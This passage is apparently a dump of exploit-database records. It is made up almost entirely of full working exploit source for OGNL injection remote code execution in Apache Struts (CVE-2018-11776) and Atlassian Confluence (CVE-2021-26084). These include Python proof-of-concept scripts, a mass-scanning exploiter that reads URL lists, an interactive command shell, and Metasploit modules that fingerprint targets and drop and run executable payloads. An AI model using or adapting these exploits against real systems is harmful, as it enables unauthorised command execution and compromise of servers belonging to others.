\n.setHeader(\"#{header}\", \nClass.forName(\"javax.script.ScriptEngineManager\") \n.newInstance() \n.getEngineByName(\"js\") \n.eval(\"java.lang.Runtime.getRuntime().exec([ \n#{target['Platform'] == 'win' ? \"'cmd.exe','/c'\" : \"'/bin/sh','-c'\"}, \ncom.opensymphony.webwork.ServletActionContext.getRequest().getHeader('#{header}') \n]); '#{Faker::Internet.uuid}'\") \n) \n} \nOGNL \nend \nend \n`\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://packetstormsecurity.com/files/download/167449/atlassian_confluence_namespace_ognl_injection.rb.txt"}, {"lastseen": "2018-08-27T17:58:42", "description": "", "cvss3": {}, "published": "2018-08-25T00:00:00", "type": "packetstorm", "title": "Apache Struts 2.3 / 2.5 Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2018-08-25T00:00:00", "id": "PACKETSTORM:149087", "href": "https://packetstormsecurity.com/files/149087/Apache-Struts-2.3-2.5-Remote-Code-Execution.html", "sourceData": "`#!/usr/bin/python \n# -*- coding: utf-8 -*- \n \n# hook-s3c (github.com/hook-s3c), @hook_s3c on twitter \n \nimport sys \nimport urllib \nimport urllib2 \nimport httplib \n \n \ndef exploit(host,cmd): \nprint \"[Execute]: {}\".format(cmd) \n \nognl_payload = \"${\" \nognl_payload += \"(#_memberAccess['allowStaticMethodAccess']=true).\" \nognl_payload += \"(#cmd='{}').\".format(cmd) \nognl_payload += \"(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).\" \nognl_payload += \"(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'bash','-c',#cmd})).\" \nognl_payload += \"(#p=new java.lang.ProcessBuilder(#cmds)).\" \nognl_payload += \"(#p.redirectErrorStream(true)).\" \nognl_payload += \"(#process=#p.start()).\" \nognl_payload += \"(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).\" \nognl_payload += \"(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).\" \nognl_payload += \"(#ros.flush())\" \nognl_payload += \"}\" \n \nif not \":\" in host: \nhost = \"{}:8080\".format(host) \n \n# encode the payload \nognl_payload_encoded = urllib.quote_plus(ognl_payload) \n \n# further encoding \nurl = \"http://{}/{}/help.action\".format(host, ognl_payload_encoded.replace(\"+\",\"%20\").replace(\" \", \"%20\").replace(\"%2F\",\"/\")) \n \nprint \"[Url]: {}\\n\\n\\n\".format(url) \n \ntry: \nrequest = urllib2.Request(url) \nresponse = urllib2.urlopen(request).read() \nexcept httplib.IncompleteRead, e: \nresponse = e.partial \nprint response \n \n \nif len(sys.argv) < 3: \nsys.exit('Usage: %s <host:port> <cmd>' % sys.argv[0]) \nelse: \nexploit(sys.argv[1],sys.argv[2]) \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/149087/apachestruts23252-exec.txt"}, {"lastseen": "2018-09-08T18:08:24", "description": "", "cvss3": {}, "published": "2018-09-07T00:00:00", "type": "packetstorm", "title": "Apache Struts 2 Namespace Redirect OGNL Injection", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2018-09-07T00:00:00", "id": "PACKETSTORM:149277", "href": "https://packetstormsecurity.com/files/149277/Apache-Struts-2-Namespace-Redirect-OGNL-Injection.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::EXE \n \n# Eschewing CmdStager for now, since the use of '\\' and ';' are killing me \n#include Msf::Exploit::CmdStager # https://github.com/rapid7/metasploit-framework/wiki/How-to-use-command-stagers \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Apache Struts 2 Namespace Redirect OGNL Injection', \n'Description' => %q{ \nThis module exploits a remote code execution vulnerability in Apache Struts \nversion 2.3 - 2.3.4, and 2.5 - 2.5.16. Remote Code Execution can be performed \nvia an endpoint that makes use of a redirect action. \n \nNative payloads will be converted to executables and dropped in the \nserver's temp dir. If this fails, try a cmd/* payload, which won't \nhave to write to the disk. \n}, \n#TODO: Is that second paragraph above still accurate? \n'Author' => [ \n'Man Yue Mo', # Discovery \n'hook-s3c', # PoC \n'asoto-r7', # Metasploit module \n'wvu' # Metasploit module \n], \n'References' => [ \n['CVE', '2018-11776'], \n['URL', 'https://lgtm.com/blog/apache_struts_CVE-2018-11776'], \n['URL', 'https://cwiki.apache.org/confluence/display/WW/S2-057'], \n['URL', 'https://github.com/hook-s3c/CVE-2018-11776-Python-PoC'], \n], \n'Privileged' => false, \n'Targets' => [ \n[ \n'Automatic detection', { \n'Platform' => %w{ unix windows linux }, \n'Arch' => [ ARCH_CMD, ARCH_X86, ARCH_X64 ], \n}, \n], \n[ \n'Windows', { \n'Platform' => %w{ windows }, \n'Arch' => [ ARCH_CMD, ARCH_X86, ARCH_X64 ], \n}, \n], \n[ \n'Linux', { \n'Platform' => %w{ unix linux }, \n'Arch' => [ ARCH_CMD, ARCH_X86, ARCH_X64 ], \n'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/generic'} \n}, \n], \n], \n'DisclosureDate' => 'Aug 22 2018', # Private disclosure = Apr 10 2018 \n'DefaultTarget' => 0)) \n \nregister_options( \n[ \nOpt::RPORT(8080), \nOptString.new('TARGETURI', [ true, 'A valid base path to a struts application', '/' ]), \nOptString.new('ACTION', [ true, 'A valid endpoint that is configured as a redirect action', 'showcase.action' ]), \nOptString.new('ENABLE_STATIC', [ true, 'Enable \"allowStaticMethodAccess\" before executing OGNL', true ]), \n] \n) \nregister_advanced_options( \n[ \nOptString.new('HTTPMethod', [ true, 'The HTTP method to send in the request. Cannot contain spaces', 'GET' ]), \nOptString.new('HEADER', [ true, 'The HTTP header field used to transport the optional payload', \"X-#{rand_text_alpha(4)}\"] ), \nOptString.new('TEMPFILE', [ true, 'The temporary filename written to disk when executing a payload', \"#{rand_text_alpha(8)}\"] ), \n] \n) \nend \n \ndef check \n# METHOD 1: Try to extract the state of hte allowStaticMethodAccess variable \nognl = \"#_memberAccess['allowStaticMethodAccess']\" \n \nresp = send_struts_request(ognl) \n \n# If vulnerable, the server should return an HTTP 302 (Redirect) \n# and the 'Location' header should contain either 'true' or 'false' \nif resp && resp.headers['Location'] \noutput = resp.headers['Location'] \nvprint_status(\"Redirected to: #{output}\") \nif (output.include? '/true/') \nprint_status(\"Target does *not* require enabling 'allowStaticMethodAccess'. Setting ENABLE_STATIC to 'false'\") \ndatastore['ENABLE_STATIC'] = false \nCheckCode::Vulnerable \nelsif (output.include? '/false/') \nprint_status(\"Target requires enabling 'allowStaticMethodAccess'. Setting ENABLE_STATIC to 'true'\") \ndatastore['ENABLE_STATIC'] = true \nCheckCode::Vulnerable \nelse \nCheckCode::Safe \nend \nelsif resp && resp.code==400 \n# METHOD 2: Generate two random numbers, ask the target to add them together. \n# If it does, it's vulnerable. \na = rand(10000) \nb = rand(10000) \nc = a+b \n \nognl = \"#{a}+#{b}\" \n \nresp = send_struts_request(ognl) \n \nif resp.headers['Location'].include? c.to_s \nvprint_status(\"Redirected to: #{resp.headers['Location']}\") \nprint_status(\"Target does *not* require enabling 'allowStaticMethodAccess'. Setting ENABLE_STATIC to 'false'\") \ndatastore['ENABLE_STATIC'] = false \nCheckCode::Vulnerable \nelse \nCheckCode::Safe \nend \nend \nend \n \ndef exploit \ncase payload.arch.first \nwhen ARCH_CMD \nresp = execute_command(payload.encoded) \nelse \nresp = send_payload() \nend \nend \n \ndef encode_ognl(ognl) \n# Check and fail if the command contains the follow bad characters: \n# ';' seems to terminates the OGNL statement \n# '/' causes the target to return an HTTP/400 error \n# '\\' causes the target to return an HTTP/400 error (sometimes?) \n# '\\r' ends the GET request prematurely \n# '\\n' ends the GET request prematurely \n \n# TODO: Make sure the following line is uncommented \nbad_chars = %w[; \\\\ \\r \\n] # and maybe '/' \nbad_chars.each do |c| \nif ognl.include? c \nprint_error(\"Bad OGNL request: #{ognl}\") \nfail_with(Failure::BadConfig, \"OGNL request cannot contain a '#{c}'\") \nend \nend \n \n# The following list of characters *must* be encoded or ORNL will asplode \nencodable_chars = { \"%\": \"%25\", # Always do this one first. :-) \n\" \": \"%20\", \n\"\\\"\":\"%22\", \n\"#\": \"%23\", \n\"'\": \"%27\", \n\"<\": \"%3c\", \n\">\": \"%3e\", \n\"?\": \"%3f\", \n\"^\": \"%5e\", \n\"`\": \"%60\", \n\"{\": \"%7b\", \n\"|\": \"%7c\", \n\"}\": \"%7d\", \n#\"\\/\":\"%2f\", # Don't do this. Just leave it front-slashes in as normal. \n#\";\": \"%3b\", # Doesn't work. Anyone have a cool idea for a workaround? \n#\"\\\\\":\"%5c\", # Doesn't work. Anyone have a cool idea for a workaround? \n#\"\\\\\":\"%5c%5c\", # Doesn't work. Anyone have a cool idea for a workaround? \n} \n \nencodable_chars.each do |k,v| \n#ognl.gsub!(k,v) # TypeError wrong argument type Symbol (expected Regexp) \nognl.gsub!(\"#{k}\",\"#{v}\") \nend \nreturn ognl \nend \n \ndef send_struts_request(ognl, payload: nil) \n=begin #badchar-checking code \npre = ognl \n=end \n \nognl = \"${#{ognl}}\" \nvprint_status(\"Submitted OGNL: #{ognl}\") \nognl = encode_ognl(ognl) \n \nheaders = {'Keep-Alive': 'timeout=5, max=1000'} \n \nif payload \nvprint_status(\"Embedding payload of #{payload.length} bytes\") \nheaders[datastore['HEADER']] = payload \nend \n \n# TODO: Embed OGNL in an HTTP header to hide it from the Tomcat logs \nuri = \"/#{ognl}/#{datastore['ACTION']}\" \n \nresp = send_request_cgi( \n#'encode' => true, # this fails to encode '\\', which is a problem for me \n'uri' => uri, \n'method' => datastore['HTTPMethod'], \n'headers' => headers \n) \n \nif resp && resp.code == 404 \nfail_with(Failure::UnexpectedReply, \"Server returned HTTP 404, please double check TARGETURI and ACTION options\") \nend \n \n=begin #badchar-checking code \nprint_status(\"Response code: #{resp.code}\") \n#print_status(\"Response recv: BODY '#{resp.body}'\") if resp.body \nif resp.headers['Location'] \nprint_status(\"Response recv: LOC: #{resp.headers['Location'].split('/')[1]}\") \nif resp.headers['Location'].split('/')[1] == pre[1..-2] \nprint_good(\"GOT 'EM!\") \nelse \nprint_error(\" #{pre[1..-2]}\") \nend \nend \n=end \n \nresp \nend \n \ndef profile_target \n# Use OGNL to extract properties from the Java environment \n \nproperties = { 'os.name': nil, # e.g. 'Linux' \n'os.arch': nil, # e.g. 'amd64' \n'os.version': nil, # e.g. '4.4.0-112-generic' \n'user.name': nil, # e.g. 'root' \n#'user.home': nil, # e.g. '/root' (didn't work in testing) \n'user.language': nil, # e.g. 'en' \n#'java.io.tmpdir': nil, # e.g. '/usr/local/tomcat/temp' (didn't work in testing) \n} \n \nognl = \"\" \nognl << %q|(#_memberAccess['allowStaticMethodAccess']=true).| if datastore['ENABLE_STATIC'] \nognl << %Q|('#{rand_text_alpha(2)}')| \nproperties.each do |k,v| \nognl << %Q|+(@java.lang.System@getProperty('#{k}'))+':'| \nend \nognl = ognl[0...-4] \n \nr = send_struts_request(ognl) \n \nif r.code == 400 \nfail_with(Failure::UnexpectedReply, \"Server returned HTTP 400, consider toggling the ENABLE_STATIC option\") \nelsif r.headers['Location'] \n# r.headers['Location'] should look like '/bILinux:amd64:4.4.0-112-generic:root:en/help.action' \n# Extract the OGNL output from the Location path, and strip the two random chars \ns = r.headers['Location'].split('/')[1][2..-1] \n \nif s.nil? \n# Since the target didn't respond with an HTTP/400, we know the OGNL code executed. \n# But we didn't get any output, so we can't profile the target. Abort. \nreturn nil \nend \n \n# Confirm that all fields were returned, and non include extra (:) delimiters \n# If the OGNL fails, we might get a partial result back, in which case, we'll abort. \nif s.count(':') > properties.length \nprint_error(\"Failed to profile target. Response from server: #{r.to_s}\") \nfail_with(Failure::UnexpectedReply, \"Target responded with unexpected profiling data\") \nend \n \n# Separate the colon-delimited properties and store in the 'properties' hash \ns = s.split(':') \ni = 0 \nproperties.each do |k,v| \nproperties[k] = s[i] \ni += 1 \nend \n \nprint_good(\"Target profiled successfully: #{properties[:'os.name']} #{properties[:'os.version']}\" + \n\" #{properties[:'os.arch']}, running as #{properties[:'user.name']}\") \nreturn properties \nelse \nprint_error(\"Failed to profile target. Response from server: #{r.to_s}\") \nfail_with(Failure::UnexpectedReply, \"Server did not respond properly to profiling attempt.\") \nend \nend \n \ndef execute_command(cmd_input, opts={}) \n# Semicolons appear to be a bad character in OGNL. cmdstager doesn't understand that. \nif cmd_input.include? ';' \nprint_warning(\"WARNING: Command contains bad characters: semicolons (;).\") \nend \n \nbegin \nproperties = profile_target \nos = properties[:'os.name'].downcase \nrescue \nvprint_warning(\"Target profiling was unable to determine operating system\") \nos = '' \nos = 'windows' if datastore['PAYLOAD'].downcase.include? 'win' \nos = 'linux' if datastore['PAYLOAD'].downcase.include? 'linux' \nos = 'unix' if datastore['PAYLOAD'].downcase.include? 'unix' \nend \n \nif (os.include? 'linux') || (os.include? 'nix') \ncmd = \"{'sh','-c','#{cmd_input}'}\" \nelsif os.include? 'win' \ncmd = \"{'cmd.exe','/c','#{cmd_input}'}\" \nelse \nvprint_error(\"Failed to detect target OS. Attempting to execute command directly\") \ncmd = cmd_input \nend \n \n# The following OGNL will run arbitrary commands on Windows and Linux \n# targets, as well as returning STDOUT and STDERR. In my testing, \n# on Struts2 in Tomcat 7.0.79, commands timed out after 18-19 seconds. \n \nvprint_status(\"Executing: #{cmd}\") \n \nognl = \"\" \nognl << %q|(#_memberAccess['allowStaticMethodAccess']=true).| if datastore['ENABLE_STATIC'] \nognl << %Q|(#p=new java.lang.ProcessBuilder(#{cmd})).| \nognl << %q|(#p.redirectErrorStream(true)).| \nognl << %q|(#process=#p.start()).| \nognl << %q|(#r=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).| \nognl << %q|(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#r)).| \nognl << %q|(#r.flush())| \n \nr = send_struts_request(ognl) \n \nif r && r.code == 200 \nprint_good(\"Command executed:\\n#{r.body}\") \nelsif r \nif r.body.length == 0 \nprint_status(\"Payload sent, but no output provided from server.\") \nelsif r.body.length > 0 \nprint_error(\"Failed to run command. Response from server: #{r.to_s}\") \nend \nend \nend \n \ndef send_payload \n# Probe for the target OS and architecture \nbegin \nproperties = profile_target \nos = properties[:'os.name'].downcase \nrescue \nvprint_warning(\"Target profiling was unable to determine operating system\") \nos = '' \nos = 'windows' if datastore['PAYLOAD'].downcase.include? 'win' \nos = 'linux' if datastore['PAYLOAD'].downcase.include? 'linux' \nos = 'unix' if datastore['PAYLOAD'].downcase.include? 'unix' \nend \n \ndata_header = datastore['HEADER'] \nif data_header.empty? \nfail_with(Failure::BadConfig, \"HEADER parameter cannot be blank when sending a payload\") \nend \n \nrandom_filename = datastore['TEMPFILE'] \n \n# d = data stream from HTTP header \n# f = path to temp file \n# s = stream/handle to temp file \nognl = \"\" \nognl << %q|(#_memberAccess['allowStaticMethodAccess']=true).| if datastore['ENABLE_STATIC'] \nognl << %Q|(#d=@org.apache.struts2.ServletActionContext@getRequest().getHeader('#{data_header}')).| \nognl << %Q|(#f=@java.io.File@createTempFile('#{random_filename}','tmp')).| \nognl << %q|(#f.setExecutable(true)).| \nognl << %q|(#f.deleteOnExit()).| \nognl << %q|(#s=new java.io.FileOutputStream(#f)).| \nognl << %q|(#d=new sun.misc.BASE64Decoder().decodeBuffer(#d)).| \nognl << %q|(#s.write(#d)).| \nognl << %q|(#s.close()).| \nognl << %q|(#p=new java.lang.ProcessBuilder({#f.getAbsolutePath()})).| \nognl << %q|(#p.start()).| \nognl << %q|(#f.delete()).| \n \nsuccess_string = rand_text_alpha(4) \nognl << %Q|('#{success_string}')| \n \nexe = [generate_payload_exe].pack(\"m\").delete(\"\\n\") \nr = send_struts_request(ognl, payload: exe) \n \nif r && r.headers && r.headers['Location'].split('/')[1] == success_string \nprint_good(\"Payload successfully dropped and executed.\") \nelsif r && r.headers['Location'] \nvprint_error(\"RESPONSE: \" + r.headers['Location']) \nfail_with(Failure::PayloadFailed, \"Target did not successfully execute the request\") \nelsif r && r.code == 400 \nfail_with(Failure::UnexpectedReply, \"Target reported an unspecified error while executing the payload\") \nend \nend \nend \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/149277/struts2_namespace_ognl.rb.txt"}, {"lastseen": "2018-08-27T17:58:42", "description": "", "cvss3": {}, "published": "2018-08-26T00:00:00", "type": "packetstorm", "title": "Apache Struts 2.3 / 2.5 Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2018-08-26T00:00:00", "id": "PACKETSTORM:149086", "href": "https://packetstormsecurity.com/files/149086/Apache-Struts-2.3-2.5-Remote-Code-Execution.html", "sourceData": "`#!/usr/bin/env python3 \n# coding=utf-8 \n# ***************************************************** \n# struts-pwn: Apache Struts CVE-2018-11776 Exploit \n# Author: \n# Mazin Ahmed <Mazin AT MazinAhmed DOT net> \n# This code uses a payload from: \n# https://github.com/jas502n/St2-057 \n# ***************************************************** \n \nimport argparse \nimport random \nimport requests \nimport sys \ntry: \nfrom urllib import parse as urlparse \nexcept ImportError: \nimport urlparse \n \n# Disable SSL warnings \ntry: \nimport requests.packages.urllib3 \nrequests.packages.urllib3.disable_warnings() \nexcept Exception: \npass \n \nif len(sys.argv) <= 1: \nprint('[*] CVE: 2018-11776 - Apache Struts2 S2-057') \nprint('[*] Struts-PWN - @mazen160') \nprint('\\n%s -h for help.' % (sys.argv[0])) \nexit(0) \n \n \nparser = argparse.ArgumentParser() \nparser.add_argument(\"-u\", \"--url\", \ndest=\"url\", \nhelp=\"Check a single URL.\", \naction='store') \nparser.add_argument(\"-l\", \"--list\", \ndest=\"usedlist\", \nhelp=\"Check a list of URLs.\", \naction='store') \nparser.add_argument(\"-c\", \"--cmd\", \ndest=\"cmd\", \nhelp=\"Command to execute. (Default: 'id')\", \naction='store', \ndefault='id') \nparser.add_argument(\"--exploit\", \ndest=\"do_exploit\", \nhelp=\"Exploit.\", \naction='store_true') \n \n \nargs = parser.parse_args() \nurl = args.url if args.url else None \nusedlist = args.usedlist if args.usedlist else None \ncmd = args.cmd if args.cmd else None \ndo_exploit = args.do_exploit if args.do_exploit else None \n \nheaders = { \n'User-Agent': 'struts-pwn (https://github.com/mazen160/struts-pwn_CVE-2018-11776)', \n# 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36', \n'Accept': '*/*' \n} \ntimeout = 3 \n \n \ndef parse_url(url): \n\"\"\" \nParses the URL. \n\"\"\" \n \n# url: http://example.com/demo/struts2-showcase/index.action \n \nurl = url.replace('#', '%23') \nurl = url.replace(' ', '%20') \n \nif ('://' not in url): \nurl = str(\"http://\") + str(url) \nscheme = urlparse.urlparse(url).scheme \n \n# Site: http://example.com \nsite = scheme + '://' + urlparse.urlparse(url).netloc \n \n# FilePath: /demo/struts2-showcase/index.action \nfile_path = urlparse.urlparse(url).path \nif (file_path == ''): \nfile_path = '/' \n \n# Filename: index.action \ntry: \nfilename = url.split('/')[-1] \nexcept IndexError: \nfilename = '' \n \n# File Dir: /demo/struts2-showcase/ \nfile_dir = file_path.rstrip(filename) \nif (file_dir == ''): \nfile_dir = '/' \n \nreturn({\"site\": site, \n\"file_dir\": file_dir, \n\"filename\": filename}) \n \n \ndef build_injection_inputs(url): \n\"\"\" \nBuilds injection inputs for the check. \n\"\"\" \n \nparsed_url = parse_url(url) \ninjection_inputs = [] \nurl_directories = parsed_url[\"file_dir\"].split(\"/\") \n \ntry: \nurl_directories.remove(\"\") \nexcept ValueError: \npass \n \nfor i in range(len(url_directories)): \ninjection_entry = \"/\".join(url_directories[:i]) \n \nif not injection_entry.startswith(\"/\"): \ninjection_entry = \"/%s\" % (injection_entry) \n \nif not injection_entry.endswith(\"/\"): \ninjection_entry = \"%s/\" % (injection_entry) \n \ninjection_entry += \"{{INJECTION_POINT}}/\" # It will be renderred later with the payload. \ninjection_entry += parsed_url[\"filename\"] \n \ninjection_inputs.append(injection_entry) \n \nreturn(injection_inputs) \n \n \ndef check(url): \nrandom_value = int(''.join(random.choice('0123456789') for i in range(2))) \nmultiplication_value = random_value * random_value \ninjection_points = build_injection_inputs(url) \nparsed_url = parse_url(url) \nprint(\"[%] Checking for CVE-2018-11776\") \nprint(\"[*] URL: %s\" % (url)) \nprint(\"[*] Total of Attempts: (%s)\" % (len(injection_points))) \nattempts_counter = 0 \n \nfor injection_point in injection_points: \nattempts_counter += 1 \nprint(\"[%s/%s]\" % (attempts_counter, len(injection_points))) \ntesting_url = \"%s%s\" % (parsed_url[\"site\"], injection_point) \ntesting_url = testing_url.replace(\"{{INJECTION_POINT}}\", \"${{%s*%s}}\" % (random_value, random_value)) \ntry: \nresp = requests.get(testing_url, headers=headers, verify=False, timeout=timeout, allow_redirects=False) \nexcept Exception as e: \nprint(\"EXCEPTION::::--> \" + str(e)) \ncontinue \nif \"Location\" in resp.headers.keys(): \nif str(multiplication_value) in resp.headers['Location']: \nprint(\"[*] Status: Vulnerable!\") \nreturn(injection_point) \nprint(\"[*] Status: Not Affected.\") \nreturn(None) \n \n \ndef exploit(url, cmd): \nparsed_url = parse_url(url) \n \ninjection_point = check(url) \nif injection_point is None: \nprint(\"[%] Target is not vulnerable.\") \nreturn(0) \nprint(\"[%] Exploiting...\") \n \npayload = \"\"\"%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27{0}%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B51020%5D%2C%23c.read%28%23d%29%2C%23sbtest%3D@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2C%23sbtest.println%28%23d%29%2C%23sbtest.close%28%29%29%7D\"\"\".format(cmd) \n \ntesting_url = \"%s%s\" % (parsed_url[\"site\"], injection_point) \ntesting_url = testing_url.replace(\"{{INJECTION_POINT}}\", payload) \n \ntry: \nresp = requests.get(testing_url, headers=headers, verify=False, timeout=timeout, allow_redirects=False) \nexcept Exception as e: \nprint(\"EXCEPTION::::--> \" + str(e)) \nreturn(1) \n \nprint(\"[%] Response:\") \nprint(resp.text) \nreturn(0) \n \n \ndef main(url=url, usedlist=usedlist, cmd=cmd, do_exploit=do_exploit): \nif url: \nif not do_exploit: \ncheck(url) \nelse: \nexploit(url, cmd) \n \nif usedlist: \nURLs_List = [] \ntry: \nf_file = open(str(usedlist), \"r\") \nURLs_List = f_file.read().replace(\"\\r\", \"\").split(\"\\n\") \ntry: \nURLs_List.remove(\"\") \nexcept ValueError: \npass \nf_file.close() \nexcept Exception as e: \nprint(\"Error: There was an error in reading list file.\") \nprint(\"Exception: \" + str(e)) \nexit(1) \nfor url in URLs_List: \nif not do_exploit: \ncheck(url) \nelse: \nexploit(url, cmd) \n \nprint(\"[%] Done.\") \n \n \nif __name__ == \"__main__\": \ntry: \nmain(url=url, usedlist=usedlist, cmd=cmd, do_exploit=do_exploit) \nexcept KeyboardInterrupt: \nprint(\"\\nKeyboardInterrupt Detected.\") \nprint(\"Exiting...\") \nexit(0) \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/149086/apachestruts2325-exec.txt"}, {"lastseen": "2021-09-01T15:58:38", "description": "", "cvss3": {}, "published": "2021-09-01T00:00:00", "type": "packetstorm", "title": "Confluence Server 7.12.4 OGNL Injection Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-26084"], "modified": "2021-09-01T00:00:00", "id": "PACKETSTORM:164013", "href": "https://packetstormsecurity.com/files/164013/Confluence-Server-7.12.4-OGNL-Injection-Remote-Code-Execution.html", "sourceData": "`# Exploit Title: Confluence Server 7.12.4 - 'OGNL injection' Remote Code Execution (RCE) (Unauthenticated) \n# Date: 01/09/2021 \n# Exploit Author: h3v0x \n# Vendor Homepage: https://www.atlassian.com/ \n# Software Link: https://www.atlassian.com/software/confluence/download-archives \n# Version: All < 7.12.x versions before 7.12.5 \n# Tested on: Linux Distros \n# CVE : CVE-2021-26084 \n \n#!/usr/bin/python3 \n \n# References: \n# https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html \n# https://github.com/httpvoid/writeups/blob/main/Confluence-RCE.md \n \nimport requests \nfrom bs4 import BeautifulSoup \nimport optparse \n \nparser = optparse.OptionParser() \nparser.add_option('-u', '--url', action=\"store\", dest=\"url\", help=\"Base target host: http://confluencexxx.com\") \nparser.add_option('-p', '--path', action=\"store\", dest=\"path\", help=\"Path to exploitation: /pages/createpage-entervariables.action?SpaceKey=x\") \n \noptions, args = parser.parse_args() \nsession = requests.Session() \n \nurl_vuln = options.url \nendpoint = options.path \n \nif not options.url or not options.path: \n \nprint('[+] Specify an url target') \nprint('[+] Example usage: exploit.py -u http://xxxxx.com -p /pages/createpage-entervariables.action?SpaceKey=x') \nprint('[+] Example help usage: exploit.py -h') \nexit() \n \n \ndef banner(): \n \nprint('---------------------------------------------------------------') \nprint('[-] Confluence Server Webwork OGNL injection') \nprint('[-] CVE-2021-26084') \nprint('[-] https://github.com/h3v0x') \nprint('--------------------------------------------------------------- \\n') \n \n \ndef cmdExec(): \n \nwhile True: \ncmd = input('> ') \nxpl_url = url_vuln + endpoint \nxpl_headers = {\"User-Agent\": \"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36\", \"Connection\": \"close\", \"Content-Type\": \"application/x-www-form-urlencoded\", \"Accept-Encoding\": \"gzip, deflate\"} \nxpl_data = {\"queryString\": \"aaaaaaaa\\\\u0027+{Class.forName(\\\\u0027javax.script.ScriptEngineManager\\\\u0027).newInstance().getEngineByName(\\\\u0027JavaScript\\\\u0027).\\\\u0065val(\\\\u0027var isWin = java.lang.System.getProperty(\\\\u0022os.name\\\\u0022).toLowerCase().contains(\\\\u0022win\\\\u0022); var cmd = new java.lang.String(\\\\u0022\"+cmd+\"\\\\u0022);var p = new java.lang.ProcessBuilder(); if(isWin){p.command(\\\\u0022cmd.exe\\\\u0022, \\\\u0022/c\\\\u0022, cmd); } else{p.command(\\\\u0022bash\\\\u0022, \\\\u0022-c\\\\u0022, cmd); }p.redirectErrorStream(true); var process= p.start(); var inputStreamReader = new java.io.InputStreamReader(process.getInputStream()); var bufferedReader = new java.io.BufferedReader(inputStreamReader); var line = \\\\u0022\\\\u0022; var output = \\\\u0022\\\\u0022; while((line = bufferedReader.readLine()) != null){output = output + line + java.lang.Character.toString(10); }\\\\u0027)}+\\\\u0027\"} \nrawHTML = session.post(xpl_url, headers=xpl_headers, data=xpl_data) \n \nsoup = BeautifulSoup(rawHTML.text, 'html.parser') \nqueryStringValue = soup.find('input',attrs = {'name':'queryString', 'type':'hidden'})['value'] \nprint(queryStringValue) \n \n \nbanner() \ncmdExec() \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/164013/confluenceserver7124-exec.txt"}, {"lastseen": "2021-09-10T05:12:51", "description": "", "cvss3": {}, "published": "2021-09-10T00:00:00", "type": "packetstorm", "title": "Atlassian Confluence WebWork OGNL Injection", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-26084"], "modified": "2021-09-10T00:00:00", "id": "PACKETSTORM:164122", "href": "https://packetstormsecurity.com/files/164122/Atlassian-Confluence-WebWork-OGNL-Injection.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \n \nRank = ExcellentRanking \n \nprepend Msf::Exploit::Remote::AutoCheck \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::CmdStager \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Atlassian Confluence WebWork OGNL Injection', \n'Description' => %q{ \nThis module exploits an OGNL injection in Atlassian Confluence's \nWebWork component to execute commands as the Tomcat user. \n}, \n'Author' => [ \n'Benny Jacob', # Discovery \n'Jang', # Analysis \n'wvu' # Analysis and exploit \n], \n'References' => [ \n['CVE', '2021-26084'], \n['URL', 'https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html'], \n['URL', 'https://jira.atlassian.com/browse/CONFSERVER-67940'], \n['URL', 'https://attackerkb.com/topics/Eu74wdMbEL/cve-2021-26084-confluence-server-ognl-injection/rapid7-analysis'], \n['URL', 'https://github.com/httpvoid/writeups/blob/main/Confluence-RCE.md'], \n['URL', 'https://testbnull.medium.com/atlassian-confluence-pre-auth-rce-cve-2021-26084-v%C3%A0-c%C3%A2u-chuy%E1%BB%87n-v%E1%BB%81-%C4%91i%E1%BB%83m-m%C3%B9-khi-t%C3%ACm-bug-43ab36b6c455'], \n['URL', 'https://tradahacking.vn/atlassian-confluence-cve-2021-26084-the-other-side-of-bug-bounty-45ed19c814f6'] \n], \n'DisclosureDate' => '2021-08-25', # Vendor advisory \n'License' => MSF_LICENSE, \n'Platform' => ['unix', 'linux'], # TODO: Windows? \n'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64], 